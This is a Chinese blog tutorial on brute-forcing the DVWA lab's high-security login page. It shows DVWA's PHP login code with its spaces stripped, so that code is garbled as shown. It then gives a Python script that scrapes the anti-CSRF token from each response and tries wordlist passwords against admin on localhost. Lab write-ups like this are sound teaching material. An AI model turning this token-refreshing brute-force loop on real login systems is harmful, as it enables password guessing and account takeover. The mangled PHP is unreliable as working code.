滲透測試之DVWA暴力破解(High)

一:服務器端核心代碼

<?php

if(isset($_GET['Login'])){
//CheckAnti-CSRFtoken
checkToken($_REQUEST['user_token'],$_SESSION['session_token'],'index.php');

//Sanitiseusernameinput
$user=$_GET['username'];
$user=stripslashes($user);
$user=mysql_real_escape_string($user);

//Sanitisepasswordinput
$pass=$_GET['password'];
$pass=stripslashes($pass);
$pass=mysql_real_escape_string($pass);
$pass=md5($pass);

//Checkdatabase
$query="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';";
$result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>');

if($result&&mysql_num_rows($result)==1){
//Getusersdetails
$avatar=mysql_result($result,0,"avatar");

//Loginsuccessful
echo"<p>Welcometothepasswordprotectedarea{$user}</p>";
echo"<imgsrc="{$avatar}"/>";
}
else{
//Loginfailed
sleep(rand(0,3));
echo"<pre><br/>Usernameand/orpasswordincorrect.</pre>";
}

mysql_close();
}

//GenerateAnti-CSRFtoken
generateSessionToken();

?>

High級別的代碼加入了Token,可以抵禦CSRF攻擊,同時也增加了爆破的難度,通過抓包,可以看到,登錄驗證時提交了四個參數:username、password、Login以及user_token。

每次服務器返回的登陸頁面中都會包含一個隨機的user_token的值,用戶每次登錄時都要將user_token一起提交。服務器收到請求後,會優先做token的檢查,再進行sql查詢。

 二:使用python腳本對password參數進行爆破並打印結果

from bs4 import BeautifulSoup
import urllib2
header={        'Host': 'localhost',
		'Cache-Control': 'no-cache, must-revalidate',
	    'If-None-Match': "307-52156c6a290c0",
		'If-Modified-Since': 'Wed, 15 Aug 2018 05:49:00 GMT',
		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
		'Accept': '*/*',
		'Referer': 'http://localhost/DVWA/vulnerabilities/brute/index.php',
		'Accept-Encoding': 'gzip, deflate, br',
		'Accept-Language': 'zh-CN,zh;q=0.9',
		'Cookie': 'security=high; PHPSESSID=9vf87imbl5g89p3arsgaoqnf87'}
requrl = "http://localhost/DVWA/vulnerabilities/brute/"

def get_token(requrl,header):
	req = urllib2.Request(url=requrl,headers=header)
	response = urllib2.urlopen(req)
	print response.getcode(),
	the_page = response.read()
	print len(the_page)
	soup = BeautifulSoup(the_page,"html.parser")
	# print '###################'
	# print soup.find_all('input')[3].get('value')
	user_token = soup.find_all('input')[3].get('value')
	#user_token = soup.form.input.input.input.input["value"]
	return user_token

user_token = get_token(requrl,header)
i=0
for line in open('C:/Users/neton.LIU/Desktop/password.txt'):
	requrl = "http://localhost/DVWA/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
	i = i+1
	print i,'admin',line.strip(),
	user_token = get_token(requrl,header)
	if (i == 10):
		break

password.txt是我自己設置的字典,很小,我只寫了十個密碼。

打印順序:序號、用戶名、密碼、http狀態碼以及返回的頁面長度。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章